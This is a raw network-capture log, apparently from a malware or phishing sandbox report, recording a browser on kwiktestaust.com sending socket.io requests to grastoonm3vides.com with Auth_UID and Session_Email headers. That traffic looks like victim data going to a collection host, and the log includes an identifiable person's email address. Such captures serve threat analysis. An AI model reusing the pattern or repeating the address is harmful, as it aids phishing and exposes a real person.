                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qgggApcxsQKS0n48EkTeCcj3d318rUUkH%2FDMxKLeQLXtAoQeUBwAuUz0CpBqRr5vEVqExsnVI8sTONf12tZjz7%2FOnnDQsXc4wivAdcG%2BuE90%2Bcrwg8JbbPBi3u5gN8MrnBU3LJWG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024f21a7a6b38-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1247&delivery_rate=2450084&cwnd=251&unsent_bytes=0&cid=84b34a9bddc6ef96&ts=175&x=0"
                                                                2024-11-07 20:41:28 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 59 6f 75 76 51 44 4b 54 36 47 39 6f 6b 42 5f 58 41 41 42 38 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"YouvQDKT6G9okB_XAAB8","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.1649797188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:29 UTC387OUTGET /socket.io/?EIO=4&transport=polling&t=PC8N4dY HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.1649799188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:29 UTC585OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8N50m&sid=YouvQDKT6G9okB_XAAB8 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:30 UTC924INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:30 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ceGqJWjd8B%2FUm%2F1HiH5%2BPmvirMno1zty%2FPcL7CJ3k5DmCSPNjGK1bXhb%2Be%2B3t6yokXUuLlyO96hMkcO5LOKX%2FbKZ6ZMPCZmnG2gsZLSfiUy8rYzJ7YA%2FLHEKQR%2Baes%2B7ZhOAvAED"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024fadb014653-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1766&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1163&delivery_rate=1569647&cwnd=251&unsent_bytes=0&cid=b840c1db18de6084&ts=161&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.1649800188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:29 UTC560OUTGET /socket.io/?EIO=4&transport=websocket&sid=YouvQDKT6G9okB_XAAB8 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://kwiktestaust.com
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Sec-WebSocket-Key: W6GkVbbi1yF8b7RAtgXBag==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2024-11-07 20:41:49 UTC802INHTTP/1.1 400 Bad Request
                                                                Date: Thu, 07 Nov 2024 20:41:49 GMT
                                                                Content-Type: application/json
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gu%2F%2BDUuWqMYxodRTiB1CLxl7oFbOxGe2FLY2r55OGudHqSlSfUeZecMCdyqWEeHBt5kYk4he%2BTl3BGiILSZnbHSnLPTymxI0ta70ZM5RjiuWRtxAtL3GWAWX%2BgQ9lzVfIMuVxaZK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df024faea3ca927-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2072&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1121&delivery_rate=1344475&cwnd=168&unsent_bytes=0&cid=7c0a421ef4adf940&ts=19416&x=0"
                                                                2024-11-07 20:41:49 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                2024-11-07 20:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.1649798188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:30 UTC584OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8N50n&sid=YouvQDKT6G9okB_XAAB8 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.1649802188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:31 UTC754OUTPOST /socket.io/?EIO=4&transport=polling&t=PC8N50m&sid=YouvQDKT6G9okB_XAAB8 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Content-Length: 2
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Auth_UID: USER21102024U52102117
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Content-type: text/plain;charset=UTF-8
                                                                Accept: */*
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:31 UTC2OUTData Raw: 34 30
                                                                Data Ascii: 40


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.1649804188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:50 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NA6B HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:50 UTC916INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:50 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=udC9%2FkLDOh%2FBbdEji%2Fc%2FE7wfknPHYvP4BQ6XYvntjl2sOcAwyQkFjPKSzhPWz0sfQT3%2FJ28zamzcilpJub5LhpFHWGgcdty4S6YG55oV2bqqkBPr4LzTZyweBkg315K3yF2V%2FPJK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df0257cf8c128bd-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1137&delivery_rate=1783251&cwnd=248&unsent_bytes=0&cid=aba675137764acf1&ts=154&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.1649806188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:52 UTC669OUTGET /socket.io/?EIO=4&transport=polling&t=PC8NA6B HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:52 UTC822INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:52 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EY0i4%2BqYfxAX2OyOdwkmtaqAQDqd%2Fr3aNZ13TivdsNsgJAHldt3K9xxs2gphCXDF4QkAZKvlrAKmdSWvDMU9HcRF4tIk%2FHsU%2FnZQ%2FxuGccsObS7Bs8Fsfr%2BstEsQPpmLeF205hQi"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df0258758fd2cb6-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1913&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1247&delivery_rate=1506763&cwnd=251&unsent_bytes=0&cid=65b56b777280c19a&ts=456&x=0"
                                                                2024-11-07 20:41:52 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 42 62 50 36 69 61 52 79 4e 51 6e 33 72 77 39 46 41 41 42 5f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"BbP6iaRyNQn3rw9FAAB_","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.1649809188.114.96.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:53 UTC387OUTGET /socket.io/?EIO=4&transport=polling&t=PC8NA6B HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:53 UTC827INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:41:53 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 118
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cache-control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYdk0mlH7scdKBgO5%2B4%2Bx%2Ff3niFv8KQgZ116GWTrtS%2BUQcd%2F9f%2FfFpFojGyyHXZwTcTEOQenbdAH7bGj4GYJpqGDWsJb0WBArXGnzsuBMZrIAe2zSzO%2BG%2BvQe%2BuXNwhB8w6GHqB2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df0258c2dc583a1-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2416&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=965&delivery_rate=1191769&cwnd=251&unsent_bytes=0&cid=233d4b102c7590ae&ts=163&x=0"
                                                                2024-11-07 20:41:53 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 53 67 44 4c 57 6a 6b 77 50 74 38 41 49 43 51 4b 41 41 43 41 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                Data Ascii: 0{"sid":"SgDLWjkwPt8AICQKAACA","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.1649812188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:53 UTC585OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NAri&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.1649814188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:53 UTC560OUTGET /socket.io/?EIO=4&transport=websocket&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://kwiktestaust.com
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Sec-WebSocket-Key: 8l3lo2NUO79Z3xQam31puQ==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2024-11-07 20:41:54 UTC797INHTTP/1.1 400 Bad Request
                                                                Date: Thu, 07 Nov 2024 20:41:54 GMT
                                                                Content-Type: application/json
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1t7TQ7ycDIcS1Vfg1YinIfLjyxkOGmUaQ348lyO12O2v2ktkOkyexO5FfA7Pn3HMrWAINhVS7Kb90pnUPNfrHeAIzxDJkUSyVGU7yTtLFFzeTj0FRj%2Bgp3BI%2BmZmZHejaCi%2FjQG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df025907b6d7985-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19178&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1121&delivery_rate=150731&cwnd=32&unsent_bytes=0&cid=07b1dcb44b33fbf1&ts=204&x=0"
                                                                2024-11-07 20:41:54 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                2024-11-07 20:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.1649813188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:53 UTC584OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:54 UTC909INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:54 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkQ%2BiISOD6HuZf8NVH8P%2BWfrQRgd04XCrbZDXBBcZGkuYEjBMLzJ01UVjKdTBKKBm1Vkta2HO%2FL7dtTKtGvxw7WSYOLXedBwawqN8cnYFMduxkxtQhdDNrmoS9MIcedqu7m8smAU"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df025907c63e767-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19185&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1162&delivery_rate=150425&cwnd=32&unsent_bytes=0&cid=088d7e46fa4d7e17&ts=206&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.1649815188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:54 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NAxb HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.1649818188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:55 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NBA3 HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:41:55 UTC909INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:41:55 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzHSxPrFpfb4b1Ai2sbL4xWVCqAN8nz38lrOH%2BHtQRRe356a3fFoayAr4L7pnvLuiDQOgzozgzgx1wf5vtf8jV3B4Qu3jRQXOvaR%2B7Ocz4bWtwwjQ1a0w7Pe%2FixYLutVstZILIkR"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df025987bbbe757-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1137&delivery_rate=151997&cwnd=32&unsent_bytes=0&cid=a38486b1dad525c0&ts=196&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.1649819188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:55 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8NBC- HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.1649821188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:41:56 UTC694OUTGET /socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_ HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.164982235.190.80.14436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:42:02 UTC542OUTOPTIONS /report/v4?s=XzHSxPrFpfb4b1Ai2sbL4xWVCqAN8nz38lrOH%2BHtQRRe356a3fFoayAr4L7pnvLuiDQOgzozgzgx1wf5vtf8jV3B4Qu3jRQXOvaR%2B7Ocz4bWtwwjQ1a0w7Pe%2FixYLutVstZILIkR HTTP/1.1
                                                                Host: a.nel.cloudflare.com
